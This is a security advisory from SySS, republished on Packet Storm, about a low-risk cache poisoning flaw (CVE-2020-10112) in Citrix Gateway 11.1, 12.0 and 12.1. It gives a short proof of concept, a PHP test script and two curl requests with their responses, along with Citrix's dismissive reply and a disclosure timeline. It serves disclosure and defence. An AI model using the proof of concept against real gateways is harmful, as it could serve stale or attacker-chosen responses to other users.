exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Citrix Gateway 11.1 / 12.0 / 12.1 Cache Poisoning

Citrix Gateway 11.1 / 12.0 / 12.1 Cache Poisoning
Posted Mar 9, 2020
Authored by Micha Borrmann | Site syss.de

Citrix Gateway versions 11.1, 12.0, and 12.1 suffer from a cache poisoning vulnerability.

tags | exploit
advisories | CVE-2020-10112
SHA-256 | 0015b1f67eb00244860fff58d081b6a94b03615ce41aa999c016ebe81945506b

Citrix Gateway 11.1 / 12.0 / 12.1 Cache Poisoning

Change Mirror Download
Advisory ID:               SYSS-2020-005
Product: Citrix Gateway
Manufacturer: Citrix Systems, Inc.
Affected Version(s): 11.1, 12.0, 12.1
Tested Version(s): 11.1.63.15, 12.0.63.13, 12.1.55.18
Vulnerability Type: Cache Poisoning (CAPEC-141)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2020-01-31
Solution Date: no solution
Public Disclosure: 2020-03-05
CVE Reference: CVE-2020-10112
Author of Advisory: Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

"Citrix Gateway is a customer-managed solution that can be deployed on
premises or on any public cloud, such as AWS, Azure, or Google Cloud
Platform. Citrix Gateway provides users with secure access and single
sign-on to all the virtual, SaaS and web applications they need to be
productive." (see [1])

The solution contains a caching system, which stores dynamic content
for a static period of time. During the caching time, even requests
with individual parameters are answered with the cached value. This
can be abused for cache poisoning.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

If a client is asking for an URL with parameter "value=A", the
parameter will be processed and the response will be cached. If
another client is requesting the same URL but with a different
parameter "value=B", the request will be answered with the initial
response ("value=A") during the caching time (for 112 seconds).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Provide on a Citrix Gateway system ($NSGATEWAYHOST) the following PHP
script at /var/netscaler/logon/increment.php.

<?php
print(++$_POST[value]);
print("\n");
?>

The first response will be processed correctly, meaning that the
provided value in the HTTP response will be incremented by one.

$ curl --include --url https://$NSGATEWAYHOST/logon/incremental.php --data "value=41"
HTTP/1.1 200 OK
Age: 1
Date: Fri, 31 Jan 2020 12:13:11 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-store, must-revalidate
Connection: Keep-Alive
Via: NS-CACHE-10.0: 121
ETag: "KXGGENKFDKPU"
Server: Apache
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-Length: 3
Content-Type: text/html; charset=UTF-8

42


A later request will be answered with the same value, even with
another browser from another source IP address:

$ curl --include --url https://$NSGATEWAYHOST/logon/incremental.php --data "value=77" --user-agent "Mozilla"
HTTP/1.1 200 OK
Age: 71
Date: Fri, 31 Jan 2020 12:13:11 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-store,must-revalidate
Connection: Keep-Alive
Via: NS-CACHE-10.0: 121
ETag: "KXGGENKFDKPU"
Server: Apache
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-Length: 3
Content-Type: text/html; charset=UTF-8

42


If the age of the response reaches 112, the cache will be cleared and
then the correct value will be used.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS GmbH is not aware of a solution to the described security issue.
The Citrix Security Response Team responded on 02/28/2020 with the
following statement: "We have determined that the described cache
behavior does not have a security impact and is not considered a
vulnerability."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2020-01-22: Detection of the vulnerability
2020-01-31: Vulnerability reported to manufacturer
2020-02-28: Received vendor's response
2020-03-04: CVE number assigned
2020-03-05: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Citrix Gateway product website
https://www.citrix.com/products/citrix-gateway/
[2] SySS Security Advisory SYSS-2020-005
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-005.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Micha Borrmann of SySS GmbH.

E-Mail: micha.borrmann (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory
may be updated in order to provide as accurate information as
possible. The latest version of this security advisory is available on
the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close